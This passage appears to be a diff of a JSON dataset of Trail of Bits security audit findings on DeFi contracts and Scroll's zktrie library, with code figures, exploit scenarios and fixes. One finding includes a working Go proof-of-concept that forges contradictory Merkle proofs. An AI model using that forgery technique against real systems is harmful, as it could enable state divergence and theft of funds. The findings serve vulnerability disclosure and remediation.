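    onlyOwnerOrRelayer
    whenNotPaused
    returns (uint256 withdrawAmount)
{ /* ... */ }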
Exploit Scenario Eve, a malicious active LP, is able to trigger undefined behavior in the system by setting _tokenOut to a token that is vulnerable to exploitation. Recommendations Short term, analyze the implications of allowing _tokenOut to be set to an arbitrary token. Long term, validate the assumptions surrounding the lack of limits on _tokenOut as the codebase grows, and review our Token Integration Checklist to identify any related pitfalls. References imBTC Uniswap Hack", + "title": "5. Use of duplicate functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", + "body": "The ProteusLogic and Proteus contracts both contain a function used to update the internal slices array. Although calls to these functions currently lead to identical outcomes, there is a risk that a future update could be applied to one function but not the other, which would be problematic. < function _updateSlices(int128[] memory slopes, int128[] memory rootPrices) internal { < require(slopes.length == rootPrices.length); < require(slopes.length > 1); --- > function _updateSlices(int128[] memory slopes, int128[] memory rootPrices) > internal > { > if (slopes.length != rootPrices.length) { > revert UnequalArrayLengths(); > } > if (slopes.length < 2) { > revert TooFewParameters(); > } Figure 5.1: The diff between the ProteusLogic and Proteus contracts' _updateSlices() functions Using duplicate functions in different contracts is not best practice. It increases the risk of a divergence between the contracts and could significantly affect the system properties. Defining a function in one contract and having other contracts call that function is less risky. Exploit Scenario Alice, a developer of the Shell Protocol, is tasked with updating the ProteusLogic contract. The update requires a change to the Proteus._updateSlices function. However, Alice forgets to update the ProteusLogic._updateSlices function. Because of this omission, the functions' updates to the internal slices array may produce different results. Recommendations Short term, select one of the two _updateSlices functions to retain in the codebase and to maintain going forward. Long term, consider consolidating the Proteus and ProteusLogic contracts into a single implementation, and avoid duplicating logic.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: High" ] }, { - "title": "15. Withdrawal assumptions may lead to transfers of an incorrect token ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The CurveTricryptoStrategy contract manages liquidity in Curve pools and facilitates transfers of tokens between chains. While it is designed to work with one Curve vault, the vault can be set to an arbitrary pool. Thus, the contract should not make assumptions regarding the pool without validation. Each pool contains an array of tokens specifying the tokens to withdraw from that pool. However, when the vault address is set in the constructor of CurveTricryptoConfig, the pool's address is not checked against the TriCrypto pool's address. The token at index 2 in the coins array is assumed to be wrapped ether (WETH), as indicated by the code comment shown in figure 15.1. If the configuration is incorrect, a different token may be unintentionally transferred. if (unwrap) { //unwrap LP into weth transferredToken = tricryptoConfig.tricryptoLPVault().coins(2); [...] 
Figure 15.1: Part of the transferLPs function in CurveTricryptoStrategy.sol:377-379 Exploit Scenario The Curve pool array, coins, stores an address other than that of WETH in index 2. As a result, a user mistakenly sends the wrong token in a transfer. Recommendations Short term, have the constructor of CurveTricryptoConfig or the transferLPs function validate that the address of transferredToken is equal to the address of WETH. Long term, validate data from external contracts, especially data involved in the transfer of funds.", + "title": "6. Certain identity curve configurations can lead to a loss of pool tokens ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", + "body": "A rounding error in an integer division operation could lead to a loss of pool tokens and the dilution of liquidity provider (LP) tokens. We reimplemented certain of Cowri Labs's fuzz tests and used Echidna to test the system properties specified in the Automated Testing section. The original fuzz testing used a fixed amount of 100 tokens for the initial xBalance and yBalance values; after we removed that limitation, Echidna was able to break some of the invariants. The Shell Protocol team should identify the largest possible percentage decrease in pool utility or utility per shell (UPS) to better quantify the impact of a broken invariant on system behavior. In some of the breaking cases, the ratio of token balances, m, was close to the X or Y asymptote of the identity curve. This means that an attacker might be able to disturb the balance of the pool (through flash minting or a large swap, for example) and then exploit the broken invariants. Exploit Scenario Alice withdraws USD 100 worth of token X from a Proteus-based liquidity pool by burning her LP tokens. She eventually decides to reenter the pool and to provide the same amount of liquidity. Even though the curve's configuration is similar to the configuration at the time of her withdrawal, her deposit leads to only a USD 90 increase in the pool's balance of token X; thus, Alice receives fewer LP tokens than she should in return, effectively losing money because of an arithmetic error. Recommendations Short term, investigate the root cause of the failing properties. Document and test the expected rounding direction (up or down) of each arithmetic operation, and ensure that the rounding direction used in each operation benefits the pool. Long term, implement the fuzz testing recommendations outlined in appendix C.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: High", - "Difficulty: High" + "Difficulty: Undetermined" ] }, { - "title": "16. Improper validation of Chainlink data ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The latestRoundData function returns a signed integer that is coerced to an unsigned integer without checking that the value is positive. An overflow (e.g., uint(-1)) would result in drastic misrepresentation of the price and unexpected behavior. In addition, ChainlinkLib does not ensure the completeness or recency of round data, so pricing data may not reflect recent changes. It is best practice to define a window in which data is considered sufficiently recent (e.g., within a minute of the last update) by comparing the block timestamp to updatedAt. 
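A sketch of such a guarded read, for contrast with the unguarded original in figure 16.1 below (this uses Chainlink's AggregatorV3Interface; minThreshold is a deployment-specific assumption):

// Sketch: validate sign, completeness, and freshness before using the price.
function getValidatedPrice(AggregatorV3Interface _aggregator, uint256 minThreshold)
    internal
    view
    returns (uint256)
{
    (uint80 roundID, int256 price, , uint256 updatedAt, uint80 answeredInRound) =
        _aggregator.latestRoundData();
    require(price > 0, \"negative or zero price\");
    require(updatedAt != 0 && answeredInRound == roundID, \"round not finished\");
    require(block.timestamp - updatedAt <= minThreshold, \"price too old\");
    return uint256(price);
}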
(, int256 price, , , ) = _aggregator.latestRoundData(); return uint256(price); Figure 16.1: Part of the getCurrentTokenPrice function in ChainlinkLib.sol:113-114 Recommendations Short term, have latestRoundData and similar functions verify that values are non-negative before converting them to unsigned integers, and add an invariant require(updatedAt != 0 && answeredInRound == roundID) to ensure that the round has finished and that the pricing data is from the current round. Long term, define a minimum update threshold and add the following check: require((block.timestamp - updatedAt <= minThreshold) && (answeredInRound == roundID)).", + "title": "7. Lack of events for critical operations ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", + "body": "Two critical operations do not trigger events. As a result, it will be difficult to review the correct behavior of the contracts once they have been deployed. The LiquidityPoolProxy contract's setImplementation function is called to set the implementation address of the liquidity pool and does not emit an event providing confirmation of that operation to the contract's caller (figure 7.1). function setImplementation(address _implementation) external onlyOwner { implementation = ILiquidityPoolImplementation(_implementation); } Figure 7.1: The setImplementation() function in LiquidityPoolProxy.sol#L28-33 Calls to the updateSlices function in the Proteus contract do not trigger events either (figure 7.2). This is problematic because updates to the slices array have a significant effect on the configuration of the identity curve (TOB-SHELL-1). function updateSlices(int128[] memory slopes, int128[] memory rootPrices) external onlyOwner { _updateSlices(slopes, rootPrices); } Figure 7.2: The updateSlices() function in Proteus.sol#L623-628 Without events, users and blockchain-monitoring systems cannot easily detect suspicious behavior. Exploit Scenario Eve, an attacker, is able to take ownership of the LiquidityPoolProxy contract. She then sets a new implementation address. Alice, a Shell Protocol team member, is unaware of the change and does not raise a security incident. Recommendations Short term, add events for all critical operations that result in state changes. Events aid in contract monitoring and the detection of suspicious behavior. Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. A monitoring mechanism for critical events would quickly detect any compromised system components.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "25. Incorrect safeIncreaseAllowance() amount can cause invest() calls to revert ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "Calls to make investments through Sushiswap can revert because the sushiSwapRouter may not have the token allowances needed to fulfill the requests. The owner of the MosaicHolding contract is responsible for investing user-deposited funds in investment strategies. The contract owner does this by calling the contract's invest() function, which then calls makeInvestment() on the investment strategy meant to receive the funds (figure 25.1). 
function invest( IInvestmentStrategy.Investment[] calldata _investments, address _investmentStrategy, bytes calldata _data ) external override onlyAdmin validAddress(_investmentStrategy) { require(investmentStrategies[_investmentStrategy], \"ERR: STRATEGY NOT SET\"); uint256 investmentsLength = _investments.length; address contractAddress = address(this); for (uint256 i; i < investmentsLength; i++) { IInvestmentStrategy.Investment memory investment = _investments[i]; require(investment.amount != 0 && investment.token != address(0), \"ERR: TOKEN AMOUNT\"); IERC20Upgradeable token = IERC20Upgradeable(investment.token); require(token.balanceOf(contractAddress) >= investment.amount, \"ERR: BALANCE\"); token.safeApprove(_investmentStrategy, investment.amount); } uint256 mintedTokens = IInvestmentStrategy(_investmentStrategy).makeInvestment( _investments, _data ); emit FoundsInvested(_investmentStrategy, msg.sender, mintedTokens); } Figure 25.1: The invest function in MosaicHolding:190- To deposit funds into the SushiswapLiquidityProvider investment strategy, the contract must increase the sushiSwapRouter's approval limits to account for the tokenA and tokenB amounts to be transferred. However, tokenB's approval limit is increased only to the amount of the tokenA investment (figure 25.2). function makeInvestment(Investment[] calldata _investments, bytes calldata _data) external override onlyInvestor nonReentrant returns (uint256) { Investment memory investmentA = _investments[0]; Investment memory investmentB = _investments[1]; IERC20Upgradeable tokenA = IERC20Upgradeable(investmentA.token); IERC20Upgradeable tokenB = IERC20Upgradeable(investmentB.token); tokenA.safeTransferFrom(msg.sender, address(this), investmentA.amount); tokenB.safeTransferFrom(msg.sender, address(this), investmentB.amount); tokenA.safeIncreaseAllowance(address(sushiSwapRouter), investmentA.amount); tokenB.safeIncreaseAllowance(address(sushiSwapRouter), investmentA.amount); (uint256 deadline, uint256 minA, uint256 minB) = abi.decode( _data, (uint256, uint256, uint256) ); (, , uint256 liquidity) = sushiSwapRouter.addLiquidity( investmentA.token, investmentB.token, investmentA.amount, investmentB.amount, minA, minB, address(this), deadline ); return liquidity; } Figure 25.2: The makeInvestment function in SushiswapLiquidityProvider:52-85 If the amount of tokenB to be deposited is greater than that of tokenA, sushiSwapRouter will fail to transfer the tokens, and the transaction will revert. Exploit Scenario Alice, the owner of the MosaicHolding contract, wishes to invest liquidity in a Sushiswap liquidity pool. The amount of the tokenB investment is greater than that of tokenA. The sushiSwapRouter does not have the right token allowances for the transaction, and the investment request fails. Recommendations Short term, change the amount value used in the safeIncreaseAllowance() call from investmentA.amount to investmentB.amount. Long term, review the codebase to identify similar issues. Additionally, create a more extensive test suite capable of testing edge cases that may invalidate system assumptions.", + "title": "8. Ocean may accept unexpected airdrops ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", + "body": "Unexpected transfers of tokens to the Ocean contract may break its internal accounting, essentially leading to the loss of the transferred asset. To mitigate this risk, Ocean attempts to reject airdrops. 
Per the ERC721 and ERC1155 standards, contracts must implement specific methods to accept or deny token transfers. To do this, the Ocean contract uses the onERC721Received and onERC1155Received callbacks and _ERC1155InteractionStatus and _ERC721InteractionStatus storage flags. These storage flags are enabled in ERC721 and ERC1155 wrapping operations to facilitate successful standard-compliant transfers. However, the _erc721Unwrap and _erc1155Unwrap functions also enable the _ERC721InteractionStatus and _ERC1155InteractionStatus flags, respectively. Enabling these flags allows for airdrops, since the Ocean contract, not the user, is the recipient of the tokens in unwrapping operations. function _erc721Unwrap( address tokenAddress, uint256 tokenId, address userAddress, uint256 oceanId ) private { _ERC721InteractionStatus = INTERACTION; IERC721(tokenAddress).safeTransferFrom( address(this), userAddress, tokenId ); _ERC721InteractionStatus = NOT_INTERACTION; emit Erc721Unwrap(tokenAddress, tokenId, userAddress, oceanId); } Figure 8.1: The _erc721Unwrap() function in Ocean.sol#L1020- Exploit Scenario Alice calls the _erc721Unwrap function. When the onERC721Received callback function in Alice's contract is called, Alice mistakenly sends the ERC721 tokens back to the Ocean contract. As a result, her ERC721 is permanently locked in the contract and effectively burned. Recommendations Short term, disallow airdrops of standard-compliant tokens during unwrapping interactions and document the edge cases in which the Ocean contract will be unable to stop token airdrops. Long term, when the Ocean contract is expecting a specific airdrop, consider storing the originating address of the transfer and the token type alongside the relevant interaction flag.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Low" ] }, { - "title": "17. Incorrect check of token status in the providePassiveLiquidity function ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "A passive LP can provide liquidity in the form of a token that is not whitelisted. The providePassiveLiquidity() function in MosaicVault is called by users who wish to participate in the Mosaic system as passive LPs. As part of the function's execution, it checks whether there is a ReceiptToken associated with the _tokenAddress input parameter (figure 17.1). This is equivalent to checking whether the token is whitelisted by the system. function providePassiveLiquidity( uint256 _amount, address _tokenAddress) external payable override nonReentrant whenNotPaused { require(_amount > 0 || msg.value > 0, \"ERR: AMOUNT\"); if (msg.value > 0) { require( vaultConfig.getUnderlyingIOUAddress(vaultConfig.wethAddress()) != address(0), \"ERR: WETH NOT WHITELISTED\" ); _provideLiquidity(msg.value, vaultConfig.wethAddress(), 0); } else { require(_tokenAddress != address(0), \"ERR: INVALID TOKEN\"); require( vaultConfig.getUnderlyingIOUAddress(_tokenAddress) != address(0), \"ERR: TOKEN NOT WHITELISTED\" ); _provideLiquidity(_amount, _tokenAddress, 0); } } Figure 17.1: The providePassiveLiquidity function in MosaicVault:127-149 However, providePassiveLiquidity() uses an incorrect function call to check the whitelist status. Instead of calling getUnderlyingReceiptAddress(), it calls getUnderlyingIOUAddress(). The same issue occurs in checks of WETH deposits.
Exploit Scenario Eve decides to deposit liquidity in the form of a token that is whitelisted only for active LPs. The token provides a higher yield than the tokens whitelisted for passive LPs. This may enable Eve to receive a higher annual percentage yield on her deposit than other passive LPs in the system receive on theirs. Recommendations Short term, change the function called to validate tokenAddress and wethAddress from getUnderlyingIOUAddress() to getUnderlyingReceiptAddress(). Long term, take the following steps: Review the codebase to identify similar errors. Consider whether the assumption that the same tokens will be whitelisted for both passive and active LPs will hold in the future. Create a more extensive test suite capable of testing edge cases that may invalidate system assumptions.", + "title": "1. Lack of domain separation allows proof forgery ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "Merkle trees are nested tree data structures in which the hash of each branch node depends upon the hashes of its children. The hash of each node is then assumed to uniquely represent the subtree of which that node is a root. However, that assumption may be false if a leaf node can have the same hash as a branch node. A general method for preventing leaf and branch nodes from colliding in this way is domain separation. That is, given a hash function H, define the hash of a leaf to be H(L(x)) and the hash of a branch to be H(B(x)), where L and B are encoding functions that can never return the same result (perhaps because L's return values all start with the byte 0 and B's all start with the byte 1). Without domain separation, a malicious entity may be able to insert a leaf into the tree that can be later used as a branch in a Merkle path. In zktrie, the hash for a node is defined by the NodeHash method, shown in figure 1.1. As shown in the highlighted portions, the hash of a branch node is HashElems(n.ChildL,n.ChildR), while the hash of a leaf node is HashElems(1,n.NodeKey,n.valueHash). // LeafHash computes the key of a leaf node given the hIndex and hValue of the // entry of the leaf. func LeafHash(k, v *zkt.Hash) (*zkt.Hash, error) { return zkt.HashElems(big.NewInt(1), k.BigInt(), v.BigInt()) } // NodeHash computes the hash digest of the node by hashing the content in a // specific way for each type of node. This key is used as the hash of the // Merkle tree for each node. func (n *Node) NodeHash() (*zkt.Hash, error) { if n.nodeHash == nil { // Cache the key to avoid repeated hash computations. // NOTE: We are not using the type to calculate the hash! switch n.Type { case NodeTypeParent: // H(ChildL || ChildR) var err error n.nodeHash, err = zkt.HashElems(n.ChildL.BigInt(), n.ChildR.BigInt()) if err != nil { return nil, err } case NodeTypeLeaf: var err error n.valueHash, err = zkt.PreHandlingElems(n.CompressedFlags, n.ValuePreimage) if err != nil { return nil, err } n.nodeHash, err = LeafHash(n.NodeKey, n.valueHash) if err != nil { return nil, err } case NodeTypeEmpty: // Zero n.nodeHash = &zkt.HashZero default: n.nodeHash = &zkt.HashZero } } return n.nodeHash, nil } Figure 1.1: NodeHash and LeafHash (zktrie/trie/zk_trie_node.go#118-156) The function HashElems used here performs recursive hashing in a binary-tree fashion.
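For illustration, a minimal Go sketch of the prefix-based domain separation described above (generic names only; this is not zktrie's API):

func hashLeaf(h func([]byte) []byte, key, value []byte) []byte {
    // Leaf encodings always start with byte 0.
    buf := append([]byte{0}, key...)
    buf = append(buf, value...)
    return h(buf)
}

func hashBranch(h func([]byte) []byte, left, right []byte) []byte {
    // Branch encodings always start with byte 1, so a leaf encoding and a
    // branch encoding can never be equal and the two hash domains cannot collide.
    buf := append([]byte{1}, left...)
    buf = append(buf, right...)
    return h(buf)
}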
For the purpose of this finding, the key property is that HashElems(1,k,v) == H(H(1,k),v) and HashElems(n.ChildL,n.ChildR) == H(n.ChildL,n.ChildR), where H is the global two-input, one-output hash function. Therefore, a branch node b and a leaf node l where b.ChildL == H(1,l.NodeKey) and b.ChildR == l.valueHash will have equal hash values. This allows proof forgery and, for example, a malicious entity to insert a key that can be proved to be both present and nonexistent in the tree, as illustrated by the proof-of-concept test in figure 1.2. func TestMerkleTree_ForgeProof(t *testing.T) { zkTrie := newTestingMerkle(t, 10) t.Run(\"Testing for malicious proofs\", func(t *testing.T) { // Find two distinct values k1,k2 such that the first step of // the path has the sibling on the LEFT (i.e., path[0] == // false) k1, k2 := (func() (zkt.Byte32, zkt.Byte32) { k1 := zkt.Byte32{1} k2 := zkt.Byte32{2} k1_hash, _ := k1.Hash() k2_hash, _ := k2.Hash() for !getPath(1, zkt.NewHashFromBigInt(k1_hash)[:])[0] { for i := len(k1); i > 0; i -= 1 { k1[i-1] += 1 if k1[i-1] != 0 { break } } k1_hash, _ = k1.Hash() } for k1 == k2 || !getPath(1, zkt.NewHashFromBigInt(k2_hash)[:])[0] { for i := len(k2); i > 0; i -= 1 { k2[i-1] += 1 if k2[i-1] != 0 { break } } k2_hash, _ = k2.Hash() } return k1, k2 })() k1_hash_int, _ := k1.Hash() k2_hash_int, _ := k2.Hash() k1_hash := zkt.NewHashFromBigInt(k1_hash_int) k2_hash := zkt.NewHashFromBigInt(k2_hash_int) // create a dummy value for k2, and use that to craft a // malicious value for k1 k2_value := (&[2]zkt.Byte32{{2}})[:] k1_value, _ := NewLeafNode(k2_hash, 1, k2_value).NodeHash() k1_value_array := []zkt.Byte32{*zkt.NewByte32FromBytes(k1_value.Bytes())} // insert k1 into the trie with the malicious value assert.Nil(t, zkTrie.TryUpdate(zkt.NewHashFromBigInt(k1_hash_int), 0, k1_value_array)) getNode := func(hash *zkt.Hash) (*Node, error) { return zkTrie.GetNode(hash) } // query an inclusion proof for k1 k1Proof, _, err := BuildZkTrieProof(zkTrie.rootHash, k1_hash_int, 10, getNode) assert.Nil(t, err) assert.True(t, k1Proof.Existence) // check that inclusion proof against our root hash k1_val_hash, _ := NewLeafNode(k1_hash, 0, k1_value_array).NodeHash() k1Proof_root, _ := k1Proof.Verify(k1_val_hash, k1_hash) assert.Equal(t, k1Proof_root, zkTrie.rootHash) // forge a non-existence proof fakeNonExistProof := *k1Proof fakeNonExistProof.Existence = false // The new non-existence proof needs one extra level, where // the sibling hash is H(1,k1_hash) fakeNonExistProof.depth += 1 zkt.SetBitBigEndian(fakeNonExistProof.notempties[:], fakeNonExistProof.depth-1) fakeSibHash, _ := zkt.HashElems(big.NewInt(1), k1_hash_int) fakeNonExistProof.Siblings = append(fakeNonExistProof.Siblings, fakeSibHash) // Construct the NodeAux details for the malicious leaf k2_value_hash, _ := zkt.PreHandlingElems(1, k2_value) k2_nodekey := zkt.NewHashFromBigInt(k2_hash_int) fakeNonExistProof.NodeAux = &NodeAux{Key: k2_nodekey, Value: k2_value_hash} // Check our non-existence proof against the root hash fakeNonExistProof_root, _ := fakeNonExistProof.Verify(k1_val_hash, k1_hash) assert.Equal(t, fakeNonExistProof_root, zkTrie.rootHash) // fakeNonExistProof and k1Proof prove opposite things. k1 // is both in and not-in the tree! assert.NotEqual(t, fakeNonExistProof.Existence, k1Proof.Existence) }) } Figure 1.2: A proof-of-concept test case for proof forgery Exploit Scenario Suppose Alice uses the zktrie to implement the Ethereum account table in a zkEVM-based bridge with trustless state updates.
Bob submits a transaction that inserts specially crafted account data into some position in that tree. At a later time, Bob submits a transaction that depends on the result of an account table lookup. Bob generates two contradictory Merkle proofs and uses those proofs to create two zkEVM execution proofs that step to different final states. By submitting one proof each to the opposite sides of the bridge, Bob causes state divergence and a loss of funds. Recommendations Short term, modify NodeHash to domain-separate leaves and branches, such as by changing the branch hash to zkt.HashElems(big.NewInt(2),n.ChildL.BigInt(), n.ChildR.BigInt()). Long term, fully document all data structure designs and requirements, and review all assumptions to ensure that they are well founded.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: High", + "Difficulty: Medium" ] }, { - "title": "18. Solidity compiler optimizations can be problematic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The Composable Finance contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations, or in the Emscripten transpilation to solc-js, causes a security vulnerability in the Composable Finance contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "title": "2. Lack of proof validation causes denial of service on the verifier ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The Merkle tree proof verifier assumes several well-formedness properties about the received proof and node arguments. If at least one of these properties is violated, the verifier will have a runtime error. The first property that must hold is that the node associated with the Merkle proof must be a leaf node (i.e., it must contain a non-nil NodeKey field). If this is not the case, computing the rootFromProof for a nil NodeKey will cause a panic when computing the getPath function. Secondly, the Proof fields must be guaranteed to be consistent with the other fields. The code assumes that the proof depth is correct; a malformed depth will cause out-of-bounds accesses to both the NodeKey and the notempties fields.
Finally, the Siblings array length should also be validated; for example, VerifyProofZkTrie will panic due to an out-of-bounds access if the proof.Siblings field is empty (highlighted in yellow in the rootFromProof function). // VerifyProof verifies the Merkle Proof for the entry and root. func VerifyProofZkTrie(rootHash *zkt.Hash, proof *Proof, node *Node) bool { nodeHash, err := node.NodeHash() if err != nil { return false } rootFromProof, err := proof.Verify(nodeHash, node.NodeKey) if err != nil { return false } return bytes.Equal(rootHash[:], rootFromProof[:]) } // Verify the proof and calculate the root, nodeHash can be nil when try to verify // a nonexistent proof func (proof *Proof) Verify(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) { if proof.Existence { if nodeHash == nil { return nil, ErrKeyNotFound } return proof.rootFromProof(nodeHash, nodeKey) } else { if proof.NodeAux == nil { return proof.rootFromProof(&zkt.HashZero, nodeKey) } else { if bytes.Equal(nodeKey[:], proof.NodeAux.Key[:]) { return nil, fmt.Errorf(\"non-existence proof being checked against hIndex equal to nodeAux\") } midHash, err := LeafHash(proof.NodeAux.Key, proof.NodeAux.Value) if err != nil { return nil, err } return proof.rootFromProof(midHash, nodeKey) } } } func (proof *Proof) rootFromProof(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) { var err error sibIdx := len(proof.Siblings) - 1 path := getPath(int(proof.depth), nodeKey[:]) var siblingHash *zkt.Hash for lvl := int(proof.depth) - 1; lvl >= 0; lvl-- { if zkt.TestBitBigEndian(proof.notempties[:], uint(lvl)) { siblingHash = proof.Siblings[sibIdx] sibIdx-- } else { siblingHash = &zkt.HashZero } if path[lvl] { nodeHash, err = NewParentNode(siblingHash, nodeHash).NodeHash() if err != nil { return nil, err } } else { nodeHash, err = NewParentNode(nodeHash, siblingHash).NodeHash() if err != nil { return nil, err } } } return nodeHash, nil } Figure 2.1: zktrie/trie/zk_trie_impl.go#595 Exploit Scenario An attacker crafts an invalid proof that causes the proof verifier to crash, causing a denial of service in the system. Recommendations Short term, validate the proof structure before attempting to use its values. Add fuzz testing to the VerifyProofZkTrie function. Long term, add extensive tests and fuzz testing to functions interfacing with attacker-controlled values.", "labels": [ "Trail of Bits", "Severity: Medium", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "19. Lack of contract documentation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The codebases lack code documentation, high-level descriptions, and examples, making the contracts difficult to review and increasing the likelihood of user mistakes. The CrosslayerPortal codebase would benefit from additional documentation, including on the following: the logic responsible for setting the roles in the core and the reason for the manipulation of indexes; the incoming function arguments and the values used on source chains and destination chains; the arithmetic involved in reward calculations and the relayer's distribution of tokens; the checks performed by the off-chain components, such as the relayer and the rebalancing bot; the third-party integrations; and the rebalancing arithmetic and calculations. There should also be clear NatSpec documentation on every function, identifying the unit of each variable, the function's intended use, and the function's safe values.
The documentation should include all expected properties and assumptions relevant to the aforementioned aspects of the codebase. Recommendations Short term, review and properly document the aforementioned aspects of the codebase. Long term, consider writing a formal specification of the protocol.", + "title": "3. Two incompatible ways to generate proofs ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "There are two incompatible ways to generate proofs. The first implementation (figure 3.1) writes to a given callback, effectively returning []bytes. It does not have a companion verification function; it has only positive tests (zktrie/trie/zk_trie_test.go#L93-L125); and it is accessible from the C function TrieProve and the Rust function prove. The second implementation (figure 3.2) returns a pointer to a Proof struct. It has a companion verification function (zktrie/trie/zk_trie_impl.go#L595-L632); it has positive and negative tests (zktrie/trie/zk_trie_impl_test.go#L484-L537); and it is not accessible from C or Rust. // Prove is a simlified calling of ProveWithDeletion func (t *ZkTrie) Prove(key []byte, fromLevel uint, writeNode func(*Node) error) error { return t.ProveWithDeletion(key, fromLevel, writeNode, nil) } // ProveWithDeletion constructs a merkle proof for key. The result contains all encoded nodes // on the path to the value at key. The value itself is also included in the last // node and can be retrieved by verifying the proof. // // If the trie does not contain a value for key, the returned proof contains all // nodes of the longest existing prefix of the key (at least the root node), ending // with the node that proves the absence of the key. // // If the trie contain value for key, the onHit is called BEFORE writeNode being called, // both the hitted leaf node and its sibling node is provided as arguments so caller // would receive enough information for launch a deletion and calculate the new root // base on the proof data // Also notice the sibling can be nil if the trie has only one leaf func (t *ZkTrie) ProveWithDeletion(key []byte, fromLevel uint, writeNode func(*Node) error, onHit func(*Node, *Node)) error { [...] } Figure 3.1: The first way to generate proofs (zktrie/trie/zk_trie.go#143-164) // Proof defines the required elements for a MT proof of existence or // non-existence. type Proof struct { // existence indicates wether this is a proof of existence or // non-existence. Existence bool // depth indicates how deep in the tree the proof goes. depth uint // notempties is a bitmap of non-empty Siblings found in Siblings. notempties [zkt.HashByteLen - proofFlagsLen]byte // Siblings is a list of non-empty sibling node hashes. Siblings []*zkt.Hash // NodeAux contains the auxiliary information of the lowest common ancestor // node in a non-existence proof. NodeAux *NodeAux } // BuildZkTrieProof prove uniformed way to turn some data collections into Proof struct func BuildZkTrieProof(rootHash *zkt.Hash, k *big.Int, lvl int, getNode func(key *zkt.Hash) (*Node, error)) (*Proof, *Node, error) { [...] } Figure 3.2: The second way to generate proofs (zktrie/trie/zk_trie_impl.go#531-551) Recommendations Short term, decide on one implementation and remove the other implementation.
Long term, ensure full test coverage in the chosen implementation; ensure the implementation has both positive and negative testing; and add fuzz testing to the proof verification routine.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Low" ] }, { - "title": "21. Unnecessary complexity due to interactions with native and smart contract tokens ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The Composable Finance code is needlessly complex and has excessive branching. Its complexity largely results from the integration of both ERC20s and native tokens (i.e., ether). Creating separate functions that convert native tokens to ERC20s and then interact with functions that must receive ERC20 tokens (i.e., implementing separation of concerns) would drastically simplify and optimize the code. This complexity is the source of many bugs and increases the gas costs for all users, whether or not they need to distinguish between ERC20s and ether. It is best practice to make components as small as possible and to separate helpful but noncritical components into periphery contracts. This reduces the attack surface and improves readability. Figure 21.1 shows an example of complex code. if (tempData.isSlp) { IERC20(sushiConfig.slpToken()).safeTransfer( msg.sender, tempData.slpAmount ); [...] } else { //unwrap and send the right asset [...] if (tempData.isEth) { [...] } else { IERC20(sushiConfig.wethToken()).safeTransfer( Figure 21.1: Part of the withdraw function in SushiSlpStrategy.sol:L180-L216 Recommendations Short term, remove the native ether interactions and use WETH instead. Long term, minimize the function complexity by breaking functions into smaller units. Additionally, refactor the code with minimalism in mind and extend the core functionality into periphery contracts.", + "title": "4. BuildZkTrieProof does not populate NodeAux.Value ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "A nonexistence proof for some key k in a Merkle tree is a Merkle path from the root of the tree to a subtree, which would contain k if it were present but which instead is either an empty subtree or a subtree with a single leaf k2 where k != k2. In the zktrie codebase, that second case is handled by the NodeAux field in the Proof struct, as illustrated in figure 4.1. // Verify the proof and calculate the root, nodeHash can be nil when try to verify // a nonexistent proof func (proof *Proof) Verify(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) { if proof.Existence { if nodeHash == nil { return nil, ErrKeyNotFound } return proof.rootFromProof(nodeHash, nodeKey) } else { if proof.NodeAux == nil { return proof.rootFromProof(&zkt.HashZero, nodeKey) } else { if bytes.Equal(nodeKey[:], proof.NodeAux.Key[:]) { return nil, fmt.Errorf(\"non-existence proof being checked against hIndex equal to nodeAux\") } 